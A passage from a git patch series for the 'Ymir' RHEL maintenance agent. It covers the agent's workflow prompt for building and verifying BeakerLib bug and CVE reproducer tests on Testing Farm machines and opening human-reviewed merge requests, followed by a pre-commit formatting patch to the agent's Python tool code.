+ - If the Jira issue specifies a different architecture (e.g., `aarch64`, `ppc64le`, `s390x`), use that instead. + +3. Call `reserve_testing_farm_machine` with: + - `compose`: the compose string from above (e.g., `RHEL-9.8.0-Nightly`) + - `arch`: the target architecture (default: `x86_64`) + - `duration_minutes`: `60` (default; increase to 120 for complex tests) + - `ssh_public_key`: omit this parameter — the gateway uses its own SSH key automatically. + - Save the returned `id` field as `tf_request_id`. + +4. Wait for the machine to become available: + - Call `get_testing_farm_reservation_details` with `request_id` = `tf_request_id`. + - This tool polls internally for up to 10 minutes — do NOT add your own polling loop or sleep around it. + - You MUST call this tool EXACTLY ONCE. Never call it a second time. The tool already retries internally. + - Check the result: + * If `ssh_connection` is present and is NOT `"not-yet-available"`: the machine is ready. Save `ssh_connection`. + * If `state` is `"error"`, `"canceled"`, or `ssh_connection` is `"not-yet-available"`: the reservation failed or timed out. You MUST immediately jump to step 6 (cancel the reservation) and then report the error. Do NOT continue to step 4 or step 5. Do NOT retry `get_testing_farm_reservation_details`. + +5. Verify SSH connectivity: + - Call `run_remote_command` with `ssh_host` = `ssh_connection` and `command` = `"cat /etc/redhat-release"`. + - Confirm the machine is running the expected RHEL version. + - If SSH connection fails, retry once after 15 seconds (the machine may still be booting). + +### Step 4: Create tmt Test Structure Locally + +This step creates the tmt-compatible test directory structure locally. The test files will later be copied to the Testing Farm machine for verification (step 5) and committed to the tests repo for the MR (step 7). + +Use the Jira issue description, `triage_summary`, and `patch_urls` to understand the bug and design the test. 
The patch URLs show what the fix changes — by reading the fix you can determine what behavior to test (the pre-fix, buggy behavior). + +#### 4.1. Clone the Tests Repository + +1. Clone the RHEL tests repository using `clone_repository`: + - URL: `https://gitlab.com/redhat/rhel/tests/` + - Do NOT specify a `branch` parameter — omit it so the tool clones the default branch (it may not be `main`). + - Use a clone path under `/git-repos/` (the shared volume), e.g. `/git-repos/tests-`. + - If the clone path already exists from a previous failed attempt, delete it first with `run_shell_command("rm -rf /git-repos/tests-")` before retrying. + - Save the clone path as `tests_clone`. + +2. Create the test directory: + - For CVEs: `/Security//` + - For bugs (non-CVE): `/Regression//` + - Save the directory path as `test_dir`. + +3. Create the `.fmf/version` file if it does not already exist at the tests repo root: + ``` + mkdir -p /.fmf + echo "1" > /.fmf/version + ``` + +#### 4.2. Create `ai-test-description` + +Create `/ai-test-description` with the following content structure: + +``` +=== Issue Information === +Issue: +Type: + +CVE: + +Package: +Component: +Affected Version: + +=== Analysis === + + + +Fix patches: + + +=== Test Methodology === + + +=== Expected Results === +PASS: +FAIL: + +=== References === + + +``` + +#### 4.3. Create Standalone Test Scripts (`test_*`) + +Based on the bug description from the Jira issue, `triage_summary`, and `patch_urls`, create one or more standalone test scripts. These are the actual programs/scripts that exercise the bug. 
+ +Choose the language based on the package type: +- **C/C++ libraries** (e.g., `libxml2`, `openssl`, `glibc`): write a C program (`test_.c` or `test_.c`) that calls the vulnerable function with crafted input +- **Python packages** (e.g., `python-pillow`, `python-cryptography`): write a Python script (`test_.py`) +- **CLI tools** (e.g., `curl`, `binutils`, `grep`): write a shell script (`test_.sh`) that invokes the tool with triggering arguments +- **Libraries with bindings**: prefer the language closest to the vulnerability (C for a C library even if Python bindings exist) + +Each test script must: +- Be self-contained — no dependencies beyond the package under test and standard system tools +- Accept no interactive input +- Exit with a clear pass/fail signal using an appropriate detection method (see section 4.3.1 below) + +If the test needs crafted input files (malformed images, certificates, config files, etc.), create them as separate files in `test_dir` or generate them inline in the test script. Prefer generating them inline when possible to keep the test self-contained. + +**CRITICAL:** Write standalone test scripts, NOT inline heredocs in `runtest.sh`. The `runtest.sh` BeakerLib harness copies and runs these scripts; it does not contain the test logic itself. + +##### 4.3.1. Choosing the Detection Method + +Based on the bug type (inferred from the Jira issue description and triage summary), choose the appropriate pass/fail approach for your test scripts: + +1. **Crash bugs** (null pointer dereference, buffer overflow, use-after-free): + - Detection: process exits with signal (SIGSEGV, SIGABRT, SIGBUS) + - Method: run the program and check exit code; non-zero or signal = bug present + - Enhancement: use AddressSanitizer (`ASAN_OPTIONS`), Valgrind, or `LD_PRELOAD=libc_malloc_debug.so.0 GLIBC_TUNABLES=glibc.malloc.check=3` (for glibc 2.34+, where malloc checking only takes effect with the debug library preloaded) to make detection more reliable + +2.
**Memory leak bugs**: + - Detection: Valgrind `LEAK SUMMARY` with `--leak-check=full --errors-for-leak-kinds=definite,indirect --error-exitcode=1` (without `--leak-check=full`, leaks are not counted as errors and the exit code stays 0) + - Alternative: pmap RSS growth over repeated runs (document which method is authoritative) + +3. **Logic bugs** (wrong output, incorrect behavior): + - Detection: compare program output against expected output + - Method: exact string match, diff, or specific pattern in output + +4. **Hang / infinite loop bugs**: + - Detection: process does not terminate within a timeout + - Method: `timeout <N>s <command>` and check exit code 124 (timeout) + +5. **Information disclosure bugs**: + - Detection: program outputs data it should not + - Method: check for presence of sensitive data in output + +6. **Denial of service bugs** (excessive resource consumption): + - Detection: resource usage exceeds threshold + - Method: measure CPU time, memory, or disk usage + +#### 4.4. Create `runtest.sh` (BeakerLib Harness) + +Create `<test_dir>/runtest.sh` as an executable BeakerLib test harness (`chmod +x`). The harness follows this structure: + +```bash +#!/bin/bash +# SPDX-License-Identifier: GPL-2.0-or-later +# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +# +# runtest.sh of +# Description: +# Author: Ymir AI Agent +# +# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +.
/usr/share/beakerlib/beakerlib.sh || exit 1 + +PACKAGE="" + +rlJournalStart + rlPhaseStartSetup + rlAssertRpm "$PACKAGE" + rlRun "TmpDir=\\$(mktemp -d)" 0 "Creating tmp directory" + ORIG_DIR="$(pwd)" + rlRun "pushd \\$TmpDir" + # Copy test scripts and any input files to TmpDir + rlRun "cp \\$ORIG_DIR/test_* \\$TmpDir/" 0 "Copying test scripts" + # + # rlRun "gcc -o test_ test_.c $(pkg-config --cflags --libs ) -Wall" 0 "Compiling test program" + # + # rlRun "dnf install -y " 0 "Installing dependency" + rlPhaseEnd + + rlPhaseStartTest "" + # Run the reproducer and check the result + # + + # Example for crash bug: + # rlRun "./test_ " 0 "Program should not crash with fix applied" + + # Example for logic bug: + # rlRun "output=\\$(./test_.sh)" 0 "Running reproducer" + # rlAssertEquals "Output should match expected" "\\$output" "" + + # Example for memory bug: + # rlRun "valgrind --leak-check=full --errors-for-leak-kinds=definite,indirect --error-exitcode=1 ./test_" 0 "No memory leaks" + + # Example for hang bug: + # rlRun "timeout 10s ./test_.sh" 0 "Program should complete within 10 seconds" + rlPhaseEnd + + rlPhaseStartCleanup + rlRun "popd" + rlRun "rm -rf \\$TmpDir" 0 "Removing tmp directory" + rlPhaseEnd +rlJournalPrintText +rlJournalEnd +``` + +Key rules for `runtest.sh`: +- `ORIG_DIR="$(pwd)"` must be set before `pushd` so test files can be copied to `$TmpDir`. +- The `rlRun` exit code check reflects the **fixed** behavior: `rlRun "command" 0` means PASS when the command exits 0 (fix applied, no crash). When the bug is present, the command will exit non-zero or crash, causing the test phase to FAIL. +- For crash bugs where you expect a signal: use `rlRun "command" 0` — when the fix is applied the program should not crash (exit 0), and when the bug is present it will crash (non-zero exit). +- For tests that need compilation: install `gcc`, `make`, and development headers in the Setup phase. +- Keep the harness minimal — all test logic belongs in the standalone `test_*` scripts.
+ +#### 4.5. Create `main.fmf` (FMF Metadata) + +Create `/main.fmf` with appropriate metadata: + +For CVE tests: +```yaml +summary: Security test for in +description: | + +component: + - +test: ./runtest.sh +framework: beakerlib +require: + - + - beakerlib + # Add any additional runtime dependencies + # - gcc (if test needs compilation) + # - valgrind (if using valgrind detection) +duration: 10m +tag: + - + - Security + - CVE +tier: "1" +``` + +For bug (regression) tests: +```yaml +summary: Regression test for in +description: | + +component: + - +test: ./runtest.sh +framework: beakerlib +require: + - + - beakerlib + # Add any additional runtime dependencies +duration: 10m +tag: + - + - Regression +tier: "1" +``` + +Adjust `duration` based on the test complexity. Use `5m` for simple tests, `10m` for standard tests, and `30m` for tests that require compilation, large inputs, or Valgrind. + +### Step 5: Copy Reproducer to TF Machine, Run, Iterate + +This is the agentic verification loop — the core of the agent. The goal is to verify that the reproducer actually detects the bug on a real RHEL system. This step iterates: copy the test, run it, analyze the result, fix issues, and try again. + +**Iteration limit:** Maximum 5 iterations. If the reproducer cannot be verified after 5 attempts, stop and report the bug as not reproducible (with documentation of what was tried). + +#### 5.1. Copy Test Files to the TF Machine + +1. Call `copy_files_to_remote` with: + - `ssh_host`: `ssh_connection` (from step 3) + - `local_paths`: list of all files in `test_dir` (e.g., `["/runtest.sh", "/test_.c", "/main.fmf", "/ai-test-description"]`) + - `remote_dir`: `/tmp/reproducer` + +2. Verify the copy succeeded by listing the remote directory: + ``` + run_remote_command(ssh_host=ssh_connection, command="ls -la /tmp/reproducer/") + ``` + +#### 5.2. Install Dependencies and Prepare the Environment + +1. 
Install the package under test and any dependencies on the TF machine: + ``` + run_remote_command(ssh_host=ssh_connection, command="dnf install -y beakerlib ") + ``` + +2. If the test requires compilation (C test program), install build tools: + ``` + run_remote_command(ssh_host=ssh_connection, command="dnf install -y gcc make ") + ``` + +3. If the test requires Valgrind: + ``` + run_remote_command(ssh_host=ssh_connection, command="dnf install -y valgrind") + ``` + +4. Record the installed package version for the report: + ``` + run_remote_command(ssh_host=ssh_connection, command="rpm -q ") + ``` + +#### 5.3. Run the Reproducer + +1. Make the test scripts executable: + ``` + run_remote_command(ssh_host=ssh_connection, command="chmod +x /tmp/reproducer/runtest.sh /tmp/reproducer/test_*") + ``` + +2. Run the BeakerLib test harness: + ``` + run_remote_command(ssh_host=ssh_connection, command="cd /tmp/reproducer && ./runtest.sh", timeout=600) + ``` + +3. Alternatively, if running the standalone reproducer directly (for faster iteration during debugging): + ``` + run_remote_command(ssh_host=ssh_connection, command="cd /tmp/reproducer && ./ ", timeout=300) + ``` + +4. Capture the output, exit code, and any signals from the command result. + +#### 5.4. Analyze the Result + +Compare the output and exit code against the expected detection behavior: + +**Case A: Bug is REPRODUCED (test FAILS as expected — the bug is present)** +- The detection method fires: crash detected, wrong output observed, timeout hit, memory leak found, etc. +- This means the reproducer WORKS. The test correctly detects the bug on the unpatched system. +- Set `reproducer_verified` = true. +- Proceed to step 6 (return machine), then step 7 (create MR). + +**Case B: Bug is NOT reproduced (test PASSES — the bug is not triggered)** +- The program does not crash, output is correct, no timeout, no leak, etc. +- This means EITHER the reproducer is wrong OR the bug is not present on this system. 
+- Continue to 5.5 (iterate). + +**Case C: Test execution error (unrelated failure)** +- The test fails for a reason unrelated to the bug: missing dependency, compilation error, permission denied, wrong path, syntax error, etc. +- These are test bugs, not reproduction failures. +- Continue to 5.5 (iterate) — fix the test, not the detection method. + +**Important:** On a system WITHOUT the fix applied, a working reproducer should FAIL (Case A). The `rlRun "command" 0` in BeakerLib expects exit code 0 (fixed behavior). When the bug is present, the command exits non-zero, causing the BeakerLib phase to report FAIL. This FAIL means the reproducer is working correctly — it detected the bug. + +#### 5.5. Iterate on Failure (Cases B and C) + +If the reproducer did not detect the bug, increment `iteration_count` and analyze why. The analysis depends on the failure mode: + +**For Case B (bug not triggered):** + +1. **Check the package version**: Is the installed version actually vulnerable? If the system already has the fix, the test will PASS (correctly). Verify: + ``` + run_remote_command(ssh_host=ssh_connection, command="rpm -q --changelog | head -30") + ``` + If the fix is already applied on this compose, the test will not reproduce the bug. This is an expected outcome — note it and consider using an older compose, or document that the fix is already present and the reproducer is validated by the test's PASS/FAIL design. + +2. **Check trigger conditions**: Review whether the test correctly exercises the bug: + - Is the correct binary/library being tested? (Check `which `, `rpm -qf $(which )`) + - Are the right flags/options being used? + - Is the input data correctly crafted? (Examine it on the remote machine) + - Are environment variables or configuration settings correct? + +3. **Check the detection method**: Is the test checking for the right signal? + - For crash bugs: is the program actually crashing but being caught by a signal handler? 
Try running under `gdb` or checking `dmesg` / `journalctl` for segfault records. + - For logic bugs: is the expected output format wrong? Run the command manually and inspect actual output. + - For memory bugs: are you using the right Valgrind options? + +4. **Refine the test**: Based on the analysis, modify the test: + - Adjust input data (different size, different malformed fields, different structure) + - Add or change command-line flags + - Modify preconditions (create specific files, set environment variables) + - Try a different approach to triggering the bug + - Simplify — remove unnecessary complexity that might mask the bug + +**For Case C (test execution error):** + +1. **Fix compilation errors**: Read the error output, fix the test source code +2. **Fix missing dependencies**: Install additional packages +3. **Fix path issues**: Correct file paths, ensure scripts are executable +4. **Fix syntax errors**: Correct shell or program syntax +5. **Fix permission issues**: Adjust file permissions or run as appropriate user + +**After modifying the test:** + +1. Update the test files in `test_dir` locally (edit the files in place). +2. Re-copy the updated files to the TF machine: + ``` + run_remote_command(ssh_host=ssh_connection, command="rm -rf /tmp/reproducer/*") + copy_files_to_remote(ssh_host=ssh_connection, local_paths=[], remote_dir="/tmp/reproducer") + ``` +3. Re-run the reproducer (go back to 5.3). +4. If `iteration_count` >= 5, stop iterating and proceed to 5.6. + +#### 5.6. Handle Non-Reproducible Bugs + +If the bug could not be reproduced after the maximum number of iterations: + +1. Set `reproducer_verified` = false. +2. Document what was tried in each iteration: + - What trigger conditions were tested + - What the output/exit code was in each attempt + - What changes were made between iterations + - Why each attempt failed to reproduce the bug +3. 
Determine the likely reason for non-reproducibility: + - **Fix already applied**: the compose already includes the fix + - **Race condition**: requires specific timing that cannot be reliably triggered + - **Environment-specific**: requires hardware, kernel, or configuration not available on the TF machine + - **Complex preconditions**: requires a multi-service setup that cannot be simulated + - **Insufficient information**: the Jira issue and triage summary did not provide enough detail to design an effective trigger +4. Save the documentation as `not_reproducible_reason` for the output schema. +5. Propose setting Test Coverage to "Regression Only" in the Jira comment. + +### Step 6: Return Testing Farm Machine + +**CRITICAL:** This step MUST always execute, regardless of whether steps 3-5 succeeded or failed. Treat the entire step 3-5-6 sequence as a try/finally block — step 6 is the `finally`. + +1. If `tf_request_id` is set (a machine was reserved): + - Call `cancel_testing_farm_request` with `request_id` = `tf_request_id`. + - Log whether the cancellation succeeded or failed (but do not halt the workflow on failure). + +2. If `tf_request_id` is not set (reservation was never made or failed before returning a request ID), skip this step. + +3. Clear `ssh_connection` to prevent accidental reuse. + +Even if the reproducer verification succeeded, the machine must be returned. Even if an unrelated error occurred, the machine must be returned. Even if the agent is about to report an error, the machine must be returned. There are no exceptions. + +### Step 7: Create Merge Request (only if reproducer works) + +This step publishes the verified reproducer test as a merge request to the RHEL tests repository. Only execute this step if `reproducer_verified` is true AND `{{dry_run}}` is not true. + +If `reproducer_verified` is false, skip this step entirely. +If `{{dry_run}}` is true, skip this step but log what would have been created. + +#### 7.1. 
Prepare the Branch + +1. In the `tests_clone` directory, create a working branch: + ``` + git -C checkout -B reproducer/ + ``` + +2. Make shell scripts executable before staging (git tracks file mode): + ``` + chmod +x //runtest.sh //*.sh //*.ksh + ``` + +3. Stage all test files: + ``` + git -C add / + ``` + +4. Commit with a descriptive message: + ``` + : add reproducer for + + in ."> + in ."> + + + + Resolves: + + This test was created by Ymir, a Red Hat Enterprise Linux software maintenance AI agent. + + Assisted-by: Ymir + ``` + +#### 7.2. Fork, Push, and Create MR + +1. Fork the tests repository by calling `fork_repository` with: + - `repository`: `https://gitlab.com/redhat/rhel/tests/` + - Save the returned `fork_url`. + - If `fork_repository` fails (the tool returns an error), set `merge_request_url` to null, include the error message in the output `summary`, and skip the rest of step 7 entirely. Proceed directly to producing the output JSON. The reproducer test files are still valid in `test_dir` — only the MR creation is skipped. + +2. Push the branch by calling `push_to_remote_repository` with: + - `repository`: the fork URL from above + - `clone_path`: `tests_clone` + - `branch`: `reproducer/` + - If push fails, set `merge_request_url` to null, include the error in the output `summary`, and skip the rest of step 7. Proceed to producing the output JSON. + +3. Create the merge request by calling `open_merge_request` with: + - `fork_url`: from above + - `title`: `: add reproducer for ` + - `source`: `reproducer/` + - `target`: the default branch of the tests repository (check with `run_shell_command("git -C symbolic-ref refs/remotes/origin/HEAD --short")` and strip the `origin/` prefix) + - `description`: + ``` + ## Summary + + in ."> + in ."> + + + + ## Pass/Fail Criteria + + - **PASS**: + - **FAIL**: + + ## Verification + + Verified on Testing Farm (request ID: ). + The reproducer successfully on (). 
+ + ## Test Structure + + - `ai-test-description` — issue analysis and test specification + - `runtest.sh` — BeakerLib test harness + - `main.fmf` — FMF metadata + - `test_*` — standalone reproducer script(s) + + Resolves: + + --- + + > **Warning: AI-Generated MR**: Created by Ymir AI assistant. AI may make mistakes + or produce incorrect test logic. **Carefully review the test before merging. + Human RHEL QE needs to approve this contribution before merging.** + > + > By merging this MR, you agree to follow the Guidelines on Use of AI Generated Content + and Guidelines for Responsible Use of AI Code Assistants. + + ## Want to make changes to this MR? + + You can check out the source branch from the fork and push your changes directly. + + ## Customize Ymir's behavior for your package + + If there is anything that could be adjusted regarding Ymir's behavior + and is specific to your package, you can submit an MR to + gitlab.com/redhat/centos-stream/rules/. + See the customization docs for details. + + ## Questions or Issues? + + **Contact:** redhat-ymir-agent@redhat.com | **Slack:** #forum-ymir-package-automation | + **Report AI Issues:** Jira (project: Packit, component: jotnar) or GitHub + ``` + - If MR creation fails, set `merge_request_url` to null, include the error in the output `summary`, and skip the rest of step 7. Proceed to producing the output JSON. + +4. Save the returned MR URL as `merge_request_url`. + +5. Add the reproducer label by calling `add_merge_request_labels` with: + - `merge_request_url`: the MR URL from above + - `labels`: `["ymir_reproducer"]` + +--- + +**Note:** Do NOT post a Jira comment yourself. The workflow handles Jira commenting +automatically after you return your output. Focus on producing accurate output fields. 
+ +--- + +## Output Schema + +The final output must be a JSON object: + +```json +{ + "jira_issue": "RHEL-12345", + "success": true, + "reproducer_type": "cve", + "test_mr_url": "https://gitlab.com/redhat/rhel/tests/ksh/-/merge_requests/123", + "testing_farm_request_id": "tf-request-abc123", + "pass_fail_criteria": "PASS: program exits 0 (fix applied, no crash). FAIL: program exits with SIGSEGV (bug present, buffer overflow triggered).", + "summary": "Created reproducer for CVE-2025-12345 in libfoo. The vulnerability is a heap buffer overflow in parse_header() triggered by a malformed PNG with chunk length > 0x7fffffff. Test sends crafted input and checks for crash via exit code.", + "not_reproducible_reason": null +} +``` + +On failure or non-reproducible result: + +```json +{ + "jira_issue": "RHEL-12345", + "success": false, + "reproducer_type": "bug", + "test_mr_url": null, + "testing_farm_request_id": "tf-request-xyz789", + "pass_fail_criteria": "PASS: command completes within 10s. FAIL: command hangs (timeout after 10s).", + "summary": "Attempted to reproduce RHEL-12345 (infinite loop in parser). The bug requires a specific interleaving of concurrent requests that could not be reliably reproduced in 5 attempts on a single-core TF machine.", + "not_reproducible_reason": "Race condition requires multi-threaded workload with specific timing. Attempted with stress-ng and taskset but could not trigger the hang reliably." 
+} +``` + +The output fields: +- `jira_issue` (string) — the Jira issue key (upper-case) +- `success` (bool) — whether a working reproducer was created and verified +- `reproducer_type` (string) — `"cve"` or `"bug"` +- `test_mr_url` (string or null) — URL of the merge request in the tests repository (null if not created) +- `testing_farm_request_id` (string or null) — Testing Farm request ID used for verification +- `pass_fail_criteria` (string) — human-readable description of what PASS and FAIL mean +- `summary` (string) — concise description of the reproducer +- `not_reproducible_reason` (string or null) — explanation if the bug could not be reproduced (null on success) From 2b50ed6e7d2297dc878bbe087756a0222e25c243 Mon Sep 17 00:00:00 2001 From: "pre-commit-ci[bot]" <66853113+pre-commit-ci[bot]@users.noreply.github.com> Date: Fri, 19 Jun 2026 13:02:11 +0000 Subject: [PATCH 16/16] [pre-commit.ci] auto fixes from pre-commit.com hooks for more information, see https://pre-commit.ci --- ymir/agents/reproducer_agent.py | 34 +--- ymir/tools/privileged/gitlab.py | 12 +- ymir/tools/privileged/testing_farm.py | 93 +++++----- .../tests/unit/test_testing_farm.py | 168 ++++++++---------- 4 files changed, 131 insertions(+), 176 deletions(-) diff --git a/ymir/agents/reproducer_agent.py b/ymir/agents/reproducer_agent.py index 2d545f64..f66f96cb 100644 --- a/ymir/agents/reproducer_agent.py +++ b/ymir/agents/reproducer_agent.py @@ -276,9 +276,7 @@ async def handle_results(state): comment_parts.append(f"\n*Summary*:\n{result.summary}") if result.not_reproducible_reason: - comment_parts.append( - f"\n*Not Reproducible Reason*:\n{result.not_reproducible_reason}" - ) + comment_parts.append(f"\n*Not Reproducible Reason*:\n{result.not_reproducible_reason}") comment_text = "\n".join(comment_parts) @@ -357,19 +355,14 @@ async def main() -> None: user_triggered = task.user_triggered logger.info( f"Processing reproducer for JIRA issue: {input_data.jira_issue}, " - f"attempt: {task.attempts 
+ 1}" - + (" (user-triggered)" if user_triggered else "") + f"attempt: {task.attempts + 1}" + (" (user-triggered)" if user_triggered else "") ) # Duplicate-processing guard: skip if the issue already has a # reproducer-terminal label and is not currently in-progress or # user-triggered (which always gets a fresh run). current_labels = await tasks.get_jira_labels(input_data.jira_issue) - terminal_ymir_labels = [ - label - for label in current_labels - if label in _REPRODUCER_TERMINAL_LABELS - ] + terminal_ymir_labels = [label for label in current_labels if label in _REPRODUCER_TERMINAL_LABELS] if ( terminal_ymir_labels and JiraLabels.REPRODUCER_IN_PROGRESS.value not in current_labels @@ -461,9 +454,7 @@ async def retry(task, error, input_data=input_data, user_triggered=user_triggere try: logger.info(f"Starting reproducer processing for {input_data.jira_issue}") - with span_processor.start_transaction( - input_data.jira_issue, workflow="reproducer" - ): + with span_processor.start_transaction(input_data.jira_issue, workflow="reproducer"): state = await run_workflow( input_data.jira_issue, dry_run, @@ -479,21 +470,13 @@ async def retry(task, error, input_data=input_data, user_triggered=user_triggere except Exception as e: error = "".join(traceback.format_exception(e)) - logger.error( - f"Exception during reproducer processing for " - f"{input_data.jira_issue}: {error}" - ) + logger.error(f"Exception during reproducer processing for {input_data.jira_issue}: {error}") await retry( task, - ErrorData( - details=error, jira_issue=input_data.jira_issue - ).model_dump_json(), + ErrorData(details=error, jira_issue=input_data.jira_issue).model_dump_json(), ) else: - logger.info( - f"Reproducer resolved as success={output.success} " - f"for {input_data.jira_issue}" - ) + logger.info(f"Reproducer resolved as success={output.success} for {input_data.jira_issue}") # Push the completed result to the completed list await fix_await( @@ -503,8 +486,7 @@ async def retry(task, error, 
input_data=input_data, user_triggered=user_triggere ) ) logger.info( - f"Pushed {input_data.jira_issue} to " - f"{RedisQueues.COMPLETED_REPRODUCER_LIST.value}" + f"Pushed {input_data.jira_issue} to {RedisQueues.COMPLETED_REPRODUCER_LIST.value}" ) diff --git a/ymir/tools/privileged/gitlab.py b/ymir/tools/privileged/gitlab.py index 02799c25..8745fff4 100644 --- a/ymir/tools/privileged/gitlab.py +++ b/ymir/tools/privileged/gitlab.py @@ -138,10 +138,7 @@ def _get_auth_headers(url: str) -> dict[str, str]: def _sanitize_git_stderr(text: str) -> str: """Filter out lines from git stderr that may contain auth credentials.""" - return "\n".join( - line for line in text.splitlines() - if not _SENSITIVE_STDERR_RE.search(line) - ) + return "\n".join(line for line in text.splitlines() if not _SENSITIVE_STDERR_RE.search(line)) def _get_git_auth_args(repository_url: str) -> list[str]: @@ -499,9 +496,7 @@ async def _run( Path("/tmp"), # noqa: S108 } if not any(clone_path.resolve().is_relative_to(p) for p in allowed_parents): - raise ToolError( - f"Refusing to remove {clone_path}: not under an allowed base directory" - ) + raise ToolError(f"Refusing to remove {clone_path}: not under an allowed base directory") await asyncio.to_thread(shutil.rmtree, clone_path) clone_path.parent.mkdir(parents=True, exist_ok=True) command = ["git", *auth_args, "clone", repository, str(clone_path)] @@ -550,7 +545,8 @@ async def _run( command.append("--force") env = _get_mock_git_env() proc = await asyncio.create_subprocess_exec( - command[0], *command[1:], + command[0], + *command[1:], cwd=clone_path, env=env, stdout=asyncio.subprocess.DEVNULL, diff --git a/ymir/tools/privileged/testing_farm.py b/ymir/tools/privileged/testing_farm.py index 4ef0a0f6..92435817 100644 --- a/ymir/tools/privileged/testing_farm.py +++ b/ymir/tools/privileged/testing_farm.py @@ -87,7 +87,9 @@ def _testing_farm_api_post(path: str, json: dict[str, Any]) -> Any: if not response.ok: logger.error( "POST to %s 
failed\nbody:\n%s\nerror:\n%s", - url, json_dumps(_redact_secrets(json), indent=2), response.text + url, + json_dumps(_redact_secrets(json), indent=2), + response.text, ) response.raise_for_status() return response.json() @@ -346,9 +348,7 @@ async def _run( response = await asyncio.to_thread(_testing_farm_api_post, "requests", json=body) except Exception as e: - raise ToolError( - f"Failed to reserve Testing Farm machine: {e}" - ) from e + raise ToolError(f"Failed to reserve Testing Farm machine: {e}") from e return JSONToolOutput(result={"id": response["id"]}) @@ -383,9 +383,7 @@ async def _run( logger.info("Getting Testing Farm reservation details for %s", tool_input.request_id) if os.getenv("DRY_RUN", "False").lower() == "true": - return JSONToolOutput( - result={"state": "complete", "ssh_connection": "root@dry-run-host"} - ) + return JSONToolOutput(result={"state": "complete", "ssh_connection": "root@dry-run-host"}) max_attempts = 20 poll_interval = 30 @@ -407,7 +405,10 @@ async def _run( if is_transient: logger.warning( "Transient error %s polling TF %s (attempt %d/%d)", - e, tool_input.request_id, attempt, max_attempts, + e, + tool_input.request_id, + attempt, + max_attempts, ) if attempt < max_attempts: await asyncio.sleep(poll_interval) @@ -433,9 +434,7 @@ async def _run( log_resp = await asyncio.to_thread(requests.get, log_url, timeout=30) if log_resp.ok: log_text = log_resp.text - guest_match = re.search( - r"Guest is ready.*root@([\d\w.\-]+)", log_text - ) + guest_match = re.search(r"Guest is ready.*root@([\d\w.\-]+)", log_text) if not guest_match: guest_match = re.search( r"\[.*?\]\s+primary address:\s+([\d\w.\-]+)", log_text @@ -445,7 +444,9 @@ async def _run( ssh_connection = f"root@{guest_match.group(1)}" logger.info( "SSH available for %s: %s (attempt %d)", - tool_input.request_id, ssh_connection, attempt, + tool_input.request_id, + ssh_connection, + attempt, ) return JSONToolOutput( result={"state": state, "ssh_connection": ssh_connection} @@ 
-456,7 +457,10 @@ async def _run( if attempt < max_attempts: logger.info( "SSH not yet available for %s, polling again in %ds (attempt %d/%d)", - tool_input.request_id, poll_interval, attempt, max_attempts, + tool_input.request_id, + poll_interval, + attempt, + max_attempts, ) await asyncio.sleep(poll_interval) @@ -503,9 +507,7 @@ async def _run( try: await asyncio.to_thread(_testing_farm_api_delete, f"requests/{request_id}") except Exception as e: - raise ToolError( - f"Failed to cancel Testing Farm request {request_id}: {e}" - ) from e + raise ToolError(f"Failed to cancel Testing Farm request {request_id}: {e}") from e return JSONToolOutput(result={"cancelled": True, "request_id": request_id}) @@ -516,9 +518,7 @@ class RunRemoteCommandToolInput(BaseModel): timeout: int = Field(default=300, description="Timeout in seconds for the command to finish") -class RunRemoteCommandTool( - Tool[RunRemoteCommandToolInput, ToolRunOptions, JSONToolOutput[dict[str, Any]]] -): +class RunRemoteCommandTool(Tool[RunRemoteCommandToolInput, ToolRunOptions, JSONToolOutput[dict[str, Any]]]): name = "run_remote_command" description = """ Run a command on a remote machine via SSH. 
@@ -556,9 +556,12 @@ async def _run( _ensure_gateway_ssh_key() proc = await asyncio.create_subprocess_exec( "ssh", - "-i", str(_SSH_KEY_PATH), - "-o", "StrictHostKeyChecking=no", - "-o", "UserKnownHostsFile=/dev/null", + "-i", + str(_SSH_KEY_PATH), + "-o", + "StrictHostKeyChecking=no", + "-o", + "UserKnownHostsFile=/dev/null", ssh_host, command, stdout=asyncio.subprocess.PIPE, @@ -568,13 +571,9 @@ async def _run( except TimeoutError as e: proc.kill() await proc.wait() - raise ToolError( - f"Command timed out after {timeout}s on {ssh_host}: {command}" - ) from e + raise ToolError(f"Command timed out after {timeout}s on {ssh_host}: {command}") from e except Exception as e: - raise ToolError( - f"Failed to run command on {ssh_host}: {e}" - ) from e + raise ToolError(f"Failed to run command on {ssh_host}: {e}") from e return JSONToolOutput( result={ @@ -611,9 +610,7 @@ def validate_local_paths(cls, v: list[str]) -> list[str]: return v -class CopyFilesToRemoteTool( - Tool[CopyFilesToRemoteToolInput, ToolRunOptions, JSONToolOutput[dict[str, Any]]] -): +class CopyFilesToRemoteTool(Tool[CopyFilesToRemoteToolInput, ToolRunOptions, JSONToolOutput[dict[str, Any]]]): name = "copy_files_to_remote" description = """ Copy files to a remote machine via SCP. 
@@ -650,16 +647,24 @@ async def _run( _ensure_gateway_ssh_key() ssh_opts = [ - "-i", str(_SSH_KEY_PATH), - "-o", "StrictHostKeyChecking=no", - "-o", "UserKnownHostsFile=/dev/null", + "-i", + str(_SSH_KEY_PATH), + "-o", + "StrictHostKeyChecking=no", + "-o", + "UserKnownHostsFile=/dev/null", ] active_proc = None try: # Create the remote directory active_proc = await asyncio.create_subprocess_exec( - "ssh", *ssh_opts, ssh_host, "mkdir", "-p", remote_dir, + "ssh", + *ssh_opts, + ssh_host, + "mkdir", + "-p", + remote_dir, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE, ) @@ -671,25 +676,23 @@ async def _run( # Copy files via scp active_proc = await asyncio.create_subprocess_exec( - "scp", *ssh_opts, "-r", *local_paths, f"{ssh_host}:{remote_dir}", + "scp", + *ssh_opts, + "-r", + *local_paths, + f"{ssh_host}:{remote_dir}", stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE, ) _, stderr = await asyncio.wait_for(active_proc.communicate(), timeout=timeout) if active_proc.returncode != 0: - raise RuntimeError( - f"SCP failed: {stderr.decode().strip()}" - ) + raise RuntimeError(f"SCP failed: {stderr.decode().strip()}") except TimeoutError as e: if active_proc: active_proc.kill() await active_proc.wait() - raise ToolError( - f"Copy operation timed out after {timeout}s to {ssh_host}:{remote_dir}" - ) from e + raise ToolError(f"Copy operation timed out after {timeout}s to {ssh_host}:{remote_dir}") from e except Exception as e: - raise ToolError( - f"Failed to copy files to 